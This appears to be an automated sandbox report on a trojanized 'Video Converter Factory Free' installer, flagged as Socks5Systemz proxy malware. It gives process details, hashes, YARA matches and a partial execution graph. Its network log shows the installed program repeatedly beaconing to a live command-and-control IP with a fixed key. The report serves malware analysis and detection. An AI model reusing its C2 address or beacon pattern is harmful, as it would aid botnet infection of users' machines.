                                                                                                    2024-12-16 12:44:27 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:28 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:28 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    19192.168.2.949967188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:29 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:30 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:30 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:30 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    20192.168.2.949973188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:32 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:32 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:32 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    21192.168.2.949979188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:34 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:35 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:34 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:35 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    22192.168.2.949985188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:36 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:37 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:37 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:37 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    23192.168.2.949994188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:39 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:39 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:39 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:39 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    24192.168.2.950000188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:41 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:42 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:41 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:42 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    25192.168.2.950002188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:43 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:44 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:44 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:44 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    26192.168.2.950003188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:46 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:46 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:46 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:46 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    27192.168.2.950004188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:48 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:49 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:49 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    28192.168.2.950005188.119.66.1854437880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-16 12:44:50 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Host: 188.119.66.185
                                                                                                    2024-12-16 12:44:51 UTC200INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Mon, 16 Dec 2024 12:44:51 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    2024-12-16 12:44:51 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e8b723663ec13250


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:07:42:44
                                                                                                    Start date:16/12/2024
                                                                                                    Path:C:\Users\user\Desktop\Oz2UhFBTHy.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\Oz2UhFBTHy.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:3'918'263 bytes
                                                                                                    MD5 hash:667621F07A3DE153960AF063462B20FE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:2
                                                                                                    Start time:07:42:44
                                                                                                    Start date:16/12/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp" /SL5="$10434,3669199,56832,C:\Users\user\Desktop\Oz2UhFBTHy.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:706'560 bytes
                                                                                                    MD5 hash:9D6E5DF4EF5AD8914D4A482A3BC8BB55
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:3
                                                                                                    Start time:07:42:46
                                                                                                    Start date:16/12/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe" -i
                                                                                                    Imagebase:0x400000
                                                                                                    File size:3'099'386 bytes
                                                                                                    MD5 hash:044E781B9914BD4A3851BF6BA7D7C9D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1372320071.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2631419296.0000000002C79000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:21.4%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:2.4%
                                                                                                      Total number of Nodes:1520
                                                                                                      Total number of Limit Nodes:22
                                                                                                      execution_graph 5450 407548 5451 407554 CloseHandle 5450->5451 5452 40755d 5450->5452 5451->5452 6687 402b48 RaiseException 5892 407749 5893 4076dc WriteFile 5892->5893 5898 407724 5892->5898 5894 4076e8 5893->5894 5895 4076ef 5893->5895 5896 40748c 35 API calls 5894->5896 5897 407700 5895->5897 5899 4073ec 34 API calls 5895->5899 5896->5895 5898->5892 5900 4077e0 5898->5900 5899->5897 5901 4078db InterlockedExchange 5900->5901 5903 407890 5900->5903 5902 4078e7 5901->5902 6688 40294a 6689 402952 6688->6689 6690 403554 4 API calls 6689->6690 6691 402967 6689->6691 6690->6689 6692 403f4a 6693 403f53 6692->6693 6695 403f5c 6692->6695 6696 403f07 6693->6696 6699 403f09 6696->6699 6698 403f3c 6698->6695 6700 403154 4 API calls 6699->6700 6702 403e9c 6699->6702 6705 403f3d 6699->6705 6719 403e9c 6699->6719 6700->6699 6701 403ef2 6704 402674 4 API calls 6701->6704 6702->6698 6702->6701 6708 403ea9 6702->6708 6710 403e8e 6702->6710 6707 403ecf 6704->6707 6705->6695 6707->6695 6708->6707 6709 402674 4 API calls 6708->6709 6709->6707 6711 403e4c 6710->6711 6712 403e67 6711->6712 6713 403e62 6711->6713 6714 403e7b 6711->6714 6717 403e78 6712->6717 6718 402674 4 API calls 6712->6718 6716 403cc8 4 API calls 6713->6716 6715 402674 4 API calls 6714->6715 6715->6717 6716->6712 6717->6701 6717->6708 6718->6717 6720 403ed7 6719->6720 6726 403ea9 6719->6726 6722 403ef2 6720->6722 6723 403e8e 4 API calls 6720->6723 6721 403ecf 6721->6699 6724 402674 4 API calls 6722->6724 6725 403ee6 6723->6725 6724->6721 6725->6722 6725->6726 6726->6721 6727 402674 4 API calls 6726->6727 6727->6721 6246 40ac4f 6247 40abc1 6246->6247 6248 4094d8 9 API calls 6247->6248 6250 40abed 6247->6250 6248->6250 6249 40ac06 6251 40ac1a 6249->6251 6252 40ac0f DestroyWindow 6249->6252 6250->6249 6253 40ac00 RemoveDirectoryA 6250->6253 6254 40ac42 6251->6254 6255 40357c 4 API calls 6251->6255 6252->6251 6253->6249 6256 40ac38 6255->6256 6257 4025ac 4 API calls 6256->6257 6257->6254 6258 403a52 6259 403a5a WriteFile 6258->6259 6261 403a74 6258->6261 6260 403a78 GetLastError 6259->6260 6259->6261 6260->6261 6262 402654 6263 403154 4 API calls 6262->6263 6264 402614 6263->6264 6265 402632 6264->6265 6266 403154 4 API calls 6264->6266 6266->6265 6267 40ac56 6268 40ac5d 6267->6268 6270 40ac88 6267->6270 6277 409448 6268->6277 6272 403198 4 API calls 6270->6272 6271 40ac62 6271->6270 6274 40ac80 MessageBoxA 6271->6274 6273 40acc0 6272->6273 6275 403198 4 API calls 6273->6275 6274->6270 6276 40acc8 6275->6276 6278 409454 GetCurrentProcess OpenProcessToken 6277->6278 6279 4094af ExitWindowsEx 6277->6279 6280 409466 6278->6280 6281 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6278->6281 6279->6280 6280->6271 6281->6279 6281->6280 6736 40995e 6739 409960 6736->6739 6737 40999e CallWindowProcA 6738 409982 6737->6738 6739->6737 6739->6738 6740 409960 6741 409982 6740->6741 6743 40996f 6740->6743 6742 40999e CallWindowProcA 6742->6741 6743->6741 6743->6742 6744 405160 6745 405173 6744->6745 6746 404e58 33 API calls 6745->6746 6747 405187 6746->6747 6282 402e64 6283 402e69 6282->6283 6284 402e7a RtlUnwind 6283->6284 6285 402e5e 6283->6285 6286 402e9d 6284->6286 5904 40766c SetFilePointer 5905 4076a3 5904->5905 5906 407693 GetLastError 5904->5906 5906->5905 5907 40769c 5906->5907 5908 40748c 35 API calls 5907->5908 5908->5905 6299 40667c IsDBCSLeadByte 6300 406694 6299->6300 6760 403f7d 6761 403fa2 6760->6761 6764 403f84 6760->6764 6763 403e8e 4 API calls 6761->6763 6761->6764 6762 403f8c 6763->6764 6764->6762 6765 402674 4 API calls 6764->6765 6766 403fca 6765->6766 6767 403d02 6769 403d12 6767->6769 6768 403ddf ExitProcess 6769->6768 6770 403db8 6769->6770 6774 403dea 6769->6774 6777 403da4 6769->6777 6778 403d8f MessageBoxA 6769->6778 6771 403cc8 4 API calls 6770->6771 6772 403dc2 6771->6772 6773 403cc8 4 API calls 6772->6773 6775 403dcc 6773->6775 6787 4019dc 6775->6787 6783 403fe4 6777->6783 6778->6770 6779 403dd1 6779->6768 6779->6774 6784 403fe8 6783->6784 6785 403f07 4 API calls 6784->6785 6786 404006 6785->6786 6788 401abb 6787->6788 6789 4019ed 6787->6789 6788->6779 6790 401a04 RtlEnterCriticalSection 6789->6790 6791 401a0e LocalFree 6789->6791 6790->6791 6792 401a41 6791->6792 6793 401a49 6792->6793 6794 401a2f VirtualFree 6792->6794 6795 401a70 LocalFree 6793->6795 6796 401a87 6793->6796 6794->6792 6795->6795 6795->6796 6797 401aa9 RtlDeleteCriticalSection 6796->6797 6798 401a9f RtlLeaveCriticalSection 6796->6798 6797->6779 6798->6797 6305 404206 6306 4041cc 6305->6306 6307 40420a 6305->6307 6308 403154 4 API calls 6307->6308 6309 404282 6307->6309 6310 404323 6308->6310 6311 402c08 6312 402c82 6311->6312 6315 402c19 6311->6315 6313 402c56 RtlUnwind 6314 403154 4 API calls 6313->6314 6314->6312 6315->6312 6315->6313 6318 402b28 6315->6318 6319 402b31 RaiseException 6318->6319 6320 402b47 6318->6320 6319->6320 6320->6313 6321 408c10 6322 408c17 6321->6322 6323 403198 4 API calls 6322->6323 6331 408cb1 6323->6331 6324 408cdc 6325 4031b8 4 API calls 6324->6325 6326 408d69 6325->6326 6327 408cc8 6329 4032fc 18 API calls 6327->6329 6328 403278 18 API calls 6328->6331 6329->6324 6330 4032fc 18 API calls 6330->6331 6331->6324 6331->6327 6331->6328 6331->6330 6336 40a814 6337 40a839 6336->6337 6338 40993c 29 API calls 6337->6338 6341 40a83e 6338->6341 6339 40a891 6370 4026c4 GetSystemTime 6339->6370 6341->6339 6344 408dd8 18 API calls 6341->6344 6342 40a896 6343 409330 46 API calls 6342->6343 6345 40a89e 6343->6345 6346 40a86d 6344->6346 6347 4031e8 18 API calls 6345->6347 6350 40a875 MessageBoxA 6346->6350 6348 40a8ab 6347->6348 6349 406928 19 API calls 6348->6349 6351 40a8b8 6349->6351 6350->6339 6352 40a882 6350->6352 6353 4066c0 19 API calls 6351->6353 6354 405864 19 API calls 6352->6354 6355 40a8c8 6353->6355 6354->6339 6356 406638 19 API calls 6355->6356 6357 40a8d9 6356->6357 6358 403340 18 API calls 6357->6358 6359 40a8e7 6358->6359 6360 4031e8 18 API calls 6359->6360 6361 40a8f7 6360->6361 6362 4074e0 37 API calls 6361->6362 6363 40a936 6362->6363 6364 402594 18 API calls 6363->6364 6365 40a956 6364->6365 6366 407a28 19 API calls 6365->6366 6367 40a998 6366->6367 6368 407cb8 35 API calls 6367->6368 6369 40a9bf 6368->6369 6370->6342 5448 407017 5449 407008 SetErrorMode 5448->5449 6371 403018 6372 403070 6371->6372 6373 403025 6371->6373 6374 40302a RtlUnwind 6373->6374 6375 40304e 6374->6375 6377 402f78 6375->6377 6378 402be8 6375->6378 6379 402bf1 RaiseException 6378->6379 6380 402c04 6378->6380 6379->6380 6380->6372 6385 40901e 6386 409010 6385->6386 6387 408fac Wow64RevertWow64FsRedirection 6386->6387 6388 409018 6387->6388 6389 409020 SetLastError 6390 409029 6389->6390 6405 403a28 ReadFile 6406 403a46 6405->6406 6407 403a49 GetLastError 6405->6407 5909 40762c ReadFile 5910 407663 5909->5910 5911 40764c 5909->5911 5912 407652 GetLastError 5911->5912 5913 40765c 5911->5913 5912->5910 5912->5913 5914 40748c 35 API calls 5913->5914 5914->5910 6809 40712e 6810 407118 6809->6810 6811 403198 4 API calls 6810->6811 6812 407120 6811->6812 6813 403198 4 API calls 6812->6813 6814 407128 6813->6814 5929 40a82f 5930 409ae8 18 API calls 5929->5930 5931 40a834 5930->5931 5932 40a839 5931->5932 5933 402f24 5 API calls 5931->5933 5966 40993c 5932->5966 5933->5932 5935 40a891 5971 4026c4 GetSystemTime 5935->5971 5937 40a83e 5937->5935 6032 408dd8 5937->6032 5938 40a896 5972 409330 5938->5972 5942 40a86d 5946 40a875 MessageBoxA 5942->5946 5943 4031e8 18 API calls 5944 40a8ab 5943->5944 5990 406928 5944->5990 5946->5935 5948 40a882 5946->5948 6035 405864 5948->6035 5953 40a8d9 6017 403340 5953->6017 5955 40a8e7 5956 4031e8 18 API calls 5955->5956 5957 40a8f7 5956->5957 5958 4074e0 37 API calls 5957->5958 5959 40a936 5958->5959 5960 402594 18 API calls 5959->5960 5961 40a956 5960->5961 5962 407a28 19 API calls 5961->5962 5963 40a998 5962->5963 5964 407cb8 35 API calls 5963->5964 5965 40a9bf 5964->5965 6039 40953c 5966->6039 5969 4098cc 19 API calls 5970 40995c 5969->5970 5970->5937 5971->5938 5979 409350 5972->5979 5975 409375 CreateDirectoryA 5976 4093ed 5975->5976 5977 40937f GetLastError 5975->5977 5978 40322c 4 API calls 5976->5978 5977->5979 5981 4093f7 5978->5981 5979->5975 5980 408dd8 18 API calls 5979->5980 5982 404c94 33 API calls 5979->5982 5985 407284 19 API calls 5979->5985 5988 408da8 18 API calls 5979->5988 5989 405890 18 API calls 5979->5989 6095 406cf4 5979->6095 6118 409224 5979->6118 5980->5979 5983 4031b8 4 API calls 5981->5983 5982->5979 5984 409411 5983->5984 5986 4031b8 4 API calls 5984->5986 5985->5979 5987 40941e 5986->5987 5987->5943 5988->5979 5989->5979 6224 406820 5990->6224 5993 403454 18 API calls 5994 40694a 5993->5994 5995 4066c0 5994->5995 6229 4068e4 5995->6229 5998 4066f0 6001 403340 18 API calls 5998->6001 5999 4066fe 6000 403454 18 API calls 5999->6000 6002 406711 6000->6002 6003 4066fc 6001->6003 6004 403340 18 API calls 6002->6004 6005 403198 4 API calls 6003->6005 6004->6003 6006 406733 6005->6006 6007 406638 6006->6007 6008 406642 6007->6008 6009 406665 6007->6009 6235 406950 6008->6235 6011 40322c 4 API calls 6009->6011 6013 40666e 6011->6013 6012 406649 6012->6009 6014 406654 6012->6014 6013->5953 6015 403340 18 API calls 6014->6015 6016 406662 6015->6016 6016->5953 6018 403344 6017->6018 6019 4033a5 6017->6019 6020 4031e8 6018->6020 6021 40334c 6018->6021 6025 403254 18 API calls 6020->6025 6027 4031fc 6020->6027 6021->6019 6023 40335b 6021->6023 6026 4031e8 18 API calls 6021->6026 6022 403228 6022->5955 6024 403254 18 API calls 6023->6024 6029 403375 6024->6029 6025->6027 6026->6023 6027->6022 6028 4025ac 4 API calls 6027->6028 6028->6022 6030 4031e8 18 API calls 6029->6030 6031 4033a1 6030->6031 6031->5955 6033 408da8 18 API calls 6032->6033 6034 408df4 6033->6034 6034->5942 6036 405869 6035->6036 6037 405940 19 API calls 6036->6037 6038 40587b 6037->6038 6038->6038 6046 40955b 6039->6046 6040 409590 6042 40959d GetUserDefaultLangID 6040->6042 6047 409592 6040->6047 6041 409594 6051 407024 GetModuleHandleA GetProcAddress 6041->6051 6042->6047 6045 40956f 6045->5969 6046->6040 6046->6041 6046->6045 6047->6045 6048 4095cb GetACP 6047->6048 6049 4095ef 6047->6049 6048->6045 6048->6047 6049->6045 6050 409615 GetACP 6049->6050 6050->6045 6050->6049 6052 407067 6051->6052 6053 40705e 6051->6053 6054 407070 6052->6054 6055 4070a8 6052->6055 6062 403198 4 API calls 6053->6062 6072 406f68 6054->6072 6056 406f68 RegOpenKeyExA 6055->6056 6060 4070c1 6056->6060 6058 407089 6059 4070de 6058->6059 6075 406f5c 6058->6075 6064 40322c 4 API calls 6059->6064 6060->6059 6063 406f5c 20 API calls 6060->6063 6066 407120 6062->6066 6067 4070d5 RegCloseKey 6063->6067 6068 4070eb 6064->6068 6069 403198 4 API calls 6066->6069 6067->6059 6070 4032fc 18 API calls 6068->6070 6071 407128 6069->6071 6070->6053 6071->6047 6073 406f73 6072->6073 6074 406f79 RegOpenKeyExA 6072->6074 6073->6074 6074->6058 6078 406e10 6075->6078 6079 406e36 RegQueryValueExA 6078->6079 6084 406e7b 6079->6084 6086 406e59 6079->6086 6080 406e73 6082 403198 